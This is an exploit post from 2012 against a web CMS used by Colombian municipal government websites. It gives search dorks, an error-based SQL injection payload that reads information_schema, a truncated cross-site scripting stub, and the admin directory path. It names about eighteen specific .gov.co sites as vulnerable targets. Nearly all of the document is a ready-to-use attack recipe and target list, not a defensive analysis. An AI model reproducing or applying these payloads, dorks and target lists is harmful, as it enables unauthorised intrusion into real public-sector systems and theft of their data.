+-------------------------------------------------+ l # Author: Diego Asencio l l # Twitter: @Diego_Asencio l l # E-mail: diego.asencio@unillanos.edu.co l l # WorkGroup: [!]nside [0]utside - T34M l l # Twt_WG: @insid30utsid3 l +-------------------------------------------------+ ################# # INFORMACION # ################# ########################################################################################################### # Exploit Title: IPRC - SQL InjecTion / Cross-Site Scripting # Vendor Name: Internet Para La Rendicion de Cuentas # Url Vendor: http://www.iprc.org.co # Category: WebApps # Risk: Critical # GoogleDork: "index.shtml?apc=I-xx-1-&x=" [or] "sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D= " # 0day exploits : 1337day.com Inj3ct0r Exploit DataBase ########################################################################################################### ################# # 3XPL0IT # ################# ########################################################################################################### # - [SQL] - # http://www.[M/pio]-[Dep/to].gov.co/index.shtml?apc=I-xx-1-&x=[SQL] # # - [XSS] - # http://www.[M/pio]-[Dep/to].gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS] # # ( XpL SQL ) # # 2192436 and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1 Count(table_name) of information_schema.tables where table_schema=0x64625F3835303130 # # (XpL XSS ) # # ">

# # ----------------------------------------------------------------------------------------------------- # [ SAMPLE'S WEBSITES AFFECTED (SQL && XSS) INJ3CTI0N ] # ______________________________________________________________________________________________________ # # # - SQL - # # http://www.puertolopez-meta.gov.co/index.shtml?apc=I-xx-1-&x=[SQL] # http://www.aguazul-casanare.gov.co/index.shtml?apc=I-xx-1-&x=[SQL] # http://www.abejorral-antioquia.gov.co/index.shtml?apc=I-xx-1-&x=[SQL] # http://www.cantagallo-bolivar.gov.co/index.shtml?apc=I-xx-1-&x=[SQL] # http://www.caldono-cauca.gov.co/index.shtml?apc=I-xx-1-&x=[SQL] # http://www.belen-boyaca.gov.co/index.shtml?apc=I-xx-1-&x=[SQL] # http://www.istmina-choco.gov.co/index.shtml?apc=I-xx-1-&x=[SQL] # http://www.riodeoro-cesar.gov.co/index.shtml?apc=I-xx-1-&x=[SQL] # http://www.yopal-casanare.gov.co/index.shtml?apc=I-xx-1-&x=[SQL] # http://www.sucre-cauca.gov.co /index.shtml?apc=I-xx-1-&x=[SQL] # _______________________________________________________________________________________________________ # # # - XSS - # # http://www.caqueza-cundinamarca.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS] # http://www.caracoli-antioquia.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS] # http://www.caramanta-antioquia.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS] # http://www.carepa-antioquia.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS] # http://www.www.carmendecarupa-cundinamarca.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS] # http://www.carolinadelprincipe-antioquia.gov.co /sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS] # http://www.cartagenadelchaira-caqueta.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS] # http://www.castillalanueva-meta.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS] # ######################################################################################################## ::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :: Directory Admin : /apc-aa/admin/ :: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ############# # Greet's # ################################################################################# # @Sr_Xaoc - @ZiriusOpCol - @n4p573r - @Nick_Nitrous - @Ur0b0r0x # # @inj3ct0r - @Insid30utsid3 - @Anonymous_Co - @The_RevolutionH # # @unillanos_ # # 2012 # #################################################################################